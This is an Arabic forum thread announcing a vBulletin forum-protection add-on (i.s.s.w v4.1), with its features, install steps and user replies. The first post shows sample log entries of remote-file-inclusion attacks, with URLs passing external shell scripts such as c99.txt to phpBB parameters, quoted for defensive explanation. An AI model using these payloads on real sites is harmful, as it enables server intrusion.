صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 15 من 20

الموضوع: الان احمي منتداك بكل قوة من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1

  1. #1
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83

    الان احمي منتداك بكل قوة من الاختراقات هاك الحمايه الشامل i.s.s.w v4.1



    السلام عليكم ورحمة الله وبركاته

    اسم المنتج : حماية المنتدي i.s.s.w
    الإصدار : i.s.s.w v 4.1
    المبرمجين : الفريق الامني M.M.A i.s.s.w
    جديد الاصدار :
    1:قراءة ملف اللوق لمحاولات الاختراق من لوحت التحكم
    2: امكانية التحكم في الصفحة التي تعرض للمخترق
    3: اضافه لوحت تحكم مختصره cp vb
    4: اضافة اخبار عن ثغرات المنتديات في لوحت التحكم كأختصار
    5 : تنبية في التحديث
    6: تعديلات في عمل الهاك وتحديثة
    7: حماية ملف config.php مع امكانيه اضافه حمايتة مهما تغير المسمى جديد
    8: اغلاق ثغره Spacer_Open و Spacer_Close من غير تعديل قوالب جديد
    9: تغير نمط الحقوق وحذف الايقونه ووضح كود لتحقق من عدم ازارله الحقوق وهذا من حقنا

    نطلب الدعاء لنا في التوفيق وثبات الايمان
    اضافه Spacer_Open و Spacer_Close من M.M.A الفريق الامني



    عمل الهاك : حماية المنتدى بشكل كامل بعون الله









    الخيار الاول : لتشغيل حمايه المنتدي

    منع استغلال xss في المنتدي والحمد لله تم تجربة بشكل ناجح

    منع حقن التمبلتات اي اختراق الفورم هوم بنسبة 90%

    حجب عدة مواقع تساعد على العبث في المنتديات

    تطوير للدوال القديمة للتوافق معه السيرفر

    منع اكثر اوامر اليونكس وحيل الحقن في الشيل

    اظهار المواقع المصابة على سيرفرك ومحاولت استغلالها للدخول على موقعك :1 (79):

    الخيار الثاني :
    منع اكواد التحويل لاخر عشر مواضيع
    والاهداءات والاحصائيات ومسح HTml الخبيث من عنواين الموضوع


    الان نأتي للقسم الاكثر اثارة للموضوع

    عند دخولك مجلد sec

    افتح الملف logfile_hacker.txt

    ستجد اذا تعرض السيرفر او موقعك لعملية اختراق اما بالشيل او اداة سوف يتم تخزينها بالتفصيل

    كود PHP:
    2007-12-1105:50:441197370244209.67.223.188p=11575//codebb/lang_select?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt?, libwww-perl/5.808
    2007-12-1106:32:221197372742203.211.135.147t=2081//zipndownload.php?pp_path=http://www.cartographia.org/administrator/remote.txt?, libwww-perl/5.808

    2007-12-1107:09:461197374986211.157.108.187p=11575//codebb/pass_code.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt?, libwww-perl/5.79
    2007-12-1109:15:081197382508200.102.138.66t=http://firehash-filez.110mb.com/c99.txt?, Mozilla/3.0 (compatible; Indy Library) 
    الان هذول ثلاث شيلات سنشرح بالتفصيل احد الاسطر

    طبعا الفاصلة تفصل بين كل معلومه ومعلومة

    كود PHP:

    التاريخ والوقت
    كود PHP:
    2007-12-1105:50:44


    عدد المحاولات
    كود PHP:
    1197370244 
    ايبي الموقع المصااب
    كود PHP:
    209.67.223.188 

    الاصابة طبعا تشفرت لاغراض امنيه
    كود PHP:
    p=11575//codebb/lang_select 
    الاستغلال
    كود PHP:
    ?phpbb_root_path=http://5thw.lchost.co.uk/site/administrator/components/com_jreactions/safe.txt? 
    نوع الاداه او اصدارها بما انو شيل راح يطلع السطر المستخدم اما اذا كان برنامج
    يجيب اسمه بعد يعني من وين صدر الامر اذا من متصفح يطلع اسمه
    كود PHP:
    libwww-perl/5.808 


    الان شرح التركيب

    امسح جميع هاكات لها علاقه في الحمايه او منع xss

    اما من ركب هاك الحمايه issw v4.0 issw v3

    عليه فقط حذف ملف البرودكت

    وتركيب المحدث


    شرح حذف الهاك


    من لوحت تحكم المنتدي === التحكم بالمنتجات product === من جانب المراد حذفة نختار الغاء التثبيت

    ومن ثم حذف توابعه

    ---------------------------------------------------------------------------
    التركيب
    لمهم ناتي الى طريقة التثبيت نرفع ما بداخل
    upload
    ارفع المجلد sec
    الى مجلد المنتدي الرئيسي
    اعطي التصريح 666 counter.txt logfile_hacker.txt

    وارفع cpnav_issw
    داخل
    vb\includes\xml
    قوم باستدعاء البروديكت من لوحت تحكم المنتدي

    واتمنى لكم النجاح في التنصيب
    ملاحظة الهاك يتعارض مع اي هاك حمايه او من هالامور

    مع
    تحيات الفريق الامني

    الان من لوحت تحكم المنتدي قم برفع البرودكت


    تم تجربت المنتج على الاصدار

    3.6.x

    3.7.0


    لمن لديه اقتراح او تطوير او استفسار او وجد خلل في البرودكت

    يطرحه هنا في الموضوع لنصل لتطوير اكثر


    وجل من لا يخطأ وشكرا لكم[/CENTER]


    لتتبع جديد الهاك على الرابط التالي

    http://www.is-sw.net/index.php?issw=isswvb

    الحمد لله على كل شيء



    اتمنى عدم تركيبه لمواقع اباحيه او مواقع تتوجه لمعادات الاسلام واهل الكتاب السنه
    وشكرا لكم

    المصدر
    http://www.is-sw.net/vb/showthread.php?t=4329





    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر


  2. #2


    يسعدني ان اكون اول من يرد على الموضوع
    بارك الله فيك
    وجعلك عونا لاخوانك المسلمين






  3. #3
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83


    بارك الله فيك على المرور الكريم

    بعون الله بافكاركم وتشجيعكم
    ندعم المواقع العربيه والاسلاميه بكل ما اتينا من فكر

    وشكرا لك اخي





    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر

  4. #4


    يعطيك العافيه اخوي بس لو تكرمت
    انا عندي منتدى 3.6.8 ممكن يركب عليه الهاك
    واذا انا الاستظافه مركبه مود سيكيورتي على المنتدى هل يتعارض معاه
    اخوك ابو حسان الشمري






  5. #5
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83


    لا اخي ما يتعارض الهاك يشمل الحمايه من الاختراقات اللي صارت في الفتره الاخيره بتغير جميع صفحات المنتدي الى اندكس اختراق وميزات كثيره يمكنك تجربتها

    ولا يتعارض مع المود سكيورتي للسيرفر





    الملفات المرفقة الملفات المرفقة
    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر

  6. #6
    عضو جديد
    تاريخ التسجيل
    Jan 2008
    المشاركات
    2


    مشكووور و مجهود رائع من الفريق الامني

    جزاكم الله خير





    __________________
    اعلان الان في جوجل بداية من 1$ = 20 زيارة

    4master@live.com

  7. #7
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83


    حياك الله اخي

    ScO®PiOn

    وبعون الله نكون متميزين في الحمايه من اجلكم واجلنا





    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر

  8. #8
    عضو جديد
    تاريخ التسجيل
    Feb 2008
    المشاركات
    13


    مبدع يالغلا ..
    تقبل مروري





    __________________
    سبحان الله وبحمدهـ ،، سبحان الله العظيم
    للتواصل : Linux@x77v.com

  9. #9


    اخوي الله يجزاك بالخير اسالك وامل انك تجاوبني بكل امانه وانا اثق بجوابك وانا اعتبره استشاره والمستشار مؤتمن
    ما الفرق بين الهاك

    Product Rg Security v3.0

    والهاك التركي cracker tracker
    , وهاك الفريق الامنى
    وكلى امل ان يكون الفريق اقوى
    ملاحضه اخي اريد الفروقات بينهن وايهم اقوى
    واذا فيه اقوى من هاك الفريق امل ان تطوروه لاني احب اخواني المطورين العرب ان يكسروا الاحتكار الغربي
    :::::::::::::::::
    اخيرا هل يجد مثل هذا الهاك لمنتدى اخي الماسترmy smart bb
    ولكم بالتحديد






  10. #10
    عضو جديد
    تاريخ التسجيل
    Feb 2008
    المشاركات
    13


    ^
    السلام عليكم
    يجب اخوي ان تثق ان البرمجة العربية افضل بكثير من البرمجة الاجنبية
    طبعا ..

    انا مبرمج هاك Product Rg Security v3.0
    وتم صدور النسخة 4.0
    ومافي فرق بين الاتنين فكليهما يؤديان نفس الاداة ..
    تحياتي





    __________________
    سبحان الله وبحمدهـ ،، سبحان الله العظيم
    للتواصل : Linux@x77v.com

  11. #11
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    101


    تم تركيب الهاك والحمدلله
    لكن هناك شغله وهي تحسين مظهر مكان ظهور الحقوق
    لو تلاحظ لدي في المنتدى منتديات شذور الذهب - Powered by vBulletin
    خربت شكل الاستايل لو كان هناك كود للحقوق لإظهاره بشكل منسق او تحت الساعة او فوقها من وجهة نظري بتطلع احسن
    شاكر لكم اخواني وجزاكم الله خير الجزاء





    __________________
    :: سبحان الله وبحمده سبحان الله العظيم ::



  12. #12
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83


    اخوي الله يجزاك بالخير اسالك وامل انك تجاوبني بكل امانه وانا اثق بجوابك وانا اعتبره استشاره والمستشار مؤتمن
    ما الفرق بين الهاك

    Product Rg Security v3.0

    والهاك التركي cracker tracker
    , وهاك الفريق الامنى
    وكلى امل ان يكون الفريق اقوى
    ملاحضه اخي اريد الفروقات بينهن وايهم اقوى
    واذا فيه اقوى من هاك الفريق امل ان تطوروه لاني احب اخواني المطورين العرب ان يكسروا الاحتكار الغربي
    :::::::::::::::::
    اخيرا هل يجد مثل هذا الهاك لمنتدى اخي الماسترmy smart bb
    ولكم بالتحديد
    يوجد شبه في 20 %

    بين الهاك التركي وبين هاك فريقنا
    لاكن الاساس للفكره هي مبرمج واحد وهو i.s.s.w
    هاك الفريق الامني مطور كليا عن الهاك التركي

    يتميز في عده ميزات
    الاول الامان والدقه في البرمجة حيث يمتلك اربع صفات لاتوجد في غيره بسهوله
    يتميز هاك الفريق الامني في حمايه ملف config من العرض في الشيل او عن طريق عرض السورس له

    ونسبه نجاح التصدي 60% لاكن اذا تم عرض السورس لملف الكونفيق من موقع ما على السيرفر فهذي الحمايه تفقد ميزتها بعون الله سوف نجد لهذه الحركه الحل

    ثانيا :تعرضت المنتديات العربيه في الفتره الاخيره لنوعين من الحقن في التمبلتات الحمد لله في هذا الاصدار تم غلقهم نهائي دون التعديل على القوالب

    ثالثا :ميزه الاستعلام والحذف الجماعي او استغلال رقم العضويه دون الدخول للمنتدي في شكل كامل فهوا يحمي من استعلاماتها

    رابعا : اكواد التحويل وسحب الكوكيز واستغلالت كثيره تخص xss تم تلافيها في هذا الاصدار من الحمايه القويه


    وتوجد ميز اخرى ونقاط استطيع توضيحها بسهوله لاكن التجربه خير برهان على ما اقول

    بالنسبه للهاك Product Rg Security

    هو عباره عن مجمع لسرقه حقوق مبرمجين عرب واجانب ولا توجد اي اضافه حصريه فيه ويمكنك الاطلاع على سورس البرنامج ولايوجد فيه ترابط انما مضهري غير جوهري
    تجد فيه عده برمجيات جمعت باضافه الابلينق وهذا له استغلالات كثيره وخطوره ويمكن اي مبرمج توضيح هذا

    قد وضح هذا الامر اخونا بالله i.s.s.w

    ^
    السلام عليكم
    يجب اخوي ان تثق ان البرمجة العربية افضل بكثير من البرمجة الاجنبية
    طبعا ..

    انا مبرمج هاك Product Rg Security v3.0
    وتم صدور النسخة 4.0
    ومافي فرق بين الاتنين فكليهما يؤديان نفس الاداة ..
    تحياتي
    اخي ممكن توضح لنا وش اضافاتك الخاصه فيه انا ملاحظ انه حقوق غيرك فقط دمجتها
    هل تعلم ماتحتويه برمجتك ؟؟؟
    بما انك تقول انا المبرمج ؟؟؟


    تم تركيب الهاك والحمدلله
    لكن هناك شغله وهي تحسين مظهر مكان ظهور الحقوق
    لو تلاحظ لدي في المنتدى منتديات شذور الذهب - Powered by vBulletin
    خربت شكل الاستايل لو كان هناك كود للحقوق لإظهاره بشكل منسق او تحت الساعة او فوقها من وجهة نظري بتطلع احسن
    شاكر لكم اخواني وجزاكم الله خير الجزاء
    اخي توجد فقط مسافه في نهاية الحقوق بسيطه ولا ياثر في الاستايل بتاتا





    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر

  13. #13
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    101


    نعم اخي اعلم انها مسافة تظهر على متصفح الاكسبلورر لكن على فايروفكس مساحة خارجه عن التصميم

    عموما اذا كان هنالك متغير استطيع من خلاله وضع الحقوق في مكان معين فهذه طريقة مستحسنه وجيدة

    اخيرا اشكركم على هذا العمل المبارك
    دمتم بود





    __________________
    :: سبحان الله وبحمده سبحان الله العظيم ::



  14. #14
    عضو نشيط
    تاريخ التسجيل
    Jan 2008
    المشاركات
    83


    jjc_200

    اخي رفعت لك الهاك فقط ركب البرودكت المرفق

    تم مسح المسافه





    الملفات المرفقة الملفات المرفقة
    __________________
    الاسم : juba - سعود
    الموقع : الفريق الامني i.s.s.w
    رابط الموقع :www.se-te.com
    الله اكبر

  15. #15
    عضو نشيط
    تاريخ التسجيل
    Aug 2007
    المشاركات
    101


    اخي اذا مافيها كلافه ابي الحقوق تحت الساعة
    واكون شاكر لك عزيزي





    __________________
    :: سبحان الله وبحمده سبحان الله العظيم ::







ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض